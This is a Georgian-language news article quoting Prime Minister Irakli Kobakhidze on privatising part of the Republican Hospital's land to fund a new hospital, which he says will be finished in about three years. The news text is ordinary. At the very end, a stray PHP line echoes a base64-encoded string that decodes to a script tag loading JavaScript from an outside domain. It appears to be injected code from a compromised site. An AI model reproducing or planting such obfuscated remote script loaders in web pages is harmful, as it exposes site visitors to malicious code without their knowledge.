celsiusi
ავერსი საქკაბელი

 საავადმყოფოს მშენებლობა ძალიან ძვირი ჯდება, სახელმწიფოს ინტერესებშია, კერძო სექტორი შეეხიდოს ახალი საავადმყოფოს მშენებლობას, მიწის ნაკვეთის გარკვეული ნაწილი დაიტვირთება საინვესტიციო მიზნებისთვის, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ რესპუბლიკური საავადმყოფოს ექიმებთან შეხვედრის შემდეგ ჟურნალისტებთან განაცხადა.

მისივე თქმით, ჯერ ვერ იტყვის, რესპუბლიკურ საავადმყოფოსთან დაკავშირებით რა საინვესტიციო პროექტი შეიძლება, განხორციელდეს.

„საუბარია შესაბამისი ტერიტორიის პრივატიზებაზე და უშუალოდ რა ფორმით გაფორმდება ამ შენობის პრივატიზება, ეს იქნება დამოკიდებული უკვე კონკრეტულ პირობებზე. მიზანი არის შემდეგი – საავადმყოფოს მშენებოლობა ჯდება ძალიან ძვირი. სახელმწიფოს ინტერესებშია, რომ კერძო სექტორი შეეხიდოს ახალი საავადმყოფოს მშენებლობას და სწორედ ამის გამო ინიშნება ის მიწის ნაკვეთი, რომელზეც არის განთავსებული მთლიანობაში რესპუბლიკური საავადმყოფო. მიწის ნაკვეთის გარკვეული ნაწილი დაიტვირთება საინვესტიციო მიზნებისთვის, რათა კერძო სექტორი შეგვეხიდოს საავადმყოფოს მშენებლობაში, რომ ჭარბი ტვირთი არ დააწვეს სახელმწიფო ბიუჯეტს.  ვერ გეტყვით, რა საინვესტიციო პროექტი შეიძლება, განხორციელდეს. გპირდებით, რომ ქალაქისთვის, ქვეყნისთვის შეთავაზებული იქნება მაქსიმალურად ოპტიმალური ვარიანტი. მაქსიმალურად რაციონალურად დაიტვირთება ის სივრცე, რომელზეც გვაქვს საუბარი“, – განაცხადა ირაკლი კობახიძემ.

კობახიძის განმარტებით, დაახლოებით სამ წელიწადში მშენებლობა დასრულებული იქნება.

„პირველადი გეგმით, დემონტაჟის პროექტირებასა და დემონტაჟს, დაახლოებით, ერთი წელი სჭირდებოდა, შემდეგ შენობის პროექტის პროექტირებას და მშენებლობას სჭირდებოდა დაახლოებით სამი წელი. პირველი ერთი წელი დაიზოგება იქიდან გამომდინარე, რომ დემონტაჟი აღარ იქნება საჭირო. შესაბამისად, უნდა ვივარაუდოთ, რომ დაახლოებით სმაი წლის თავზე იქნება შესაძლებელი მშენებლობის დასრულება. ანუ სამწლიანი გეგმა გვექნება შეთავაზებული“, – განაცხადა კობახიძემ.

224
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");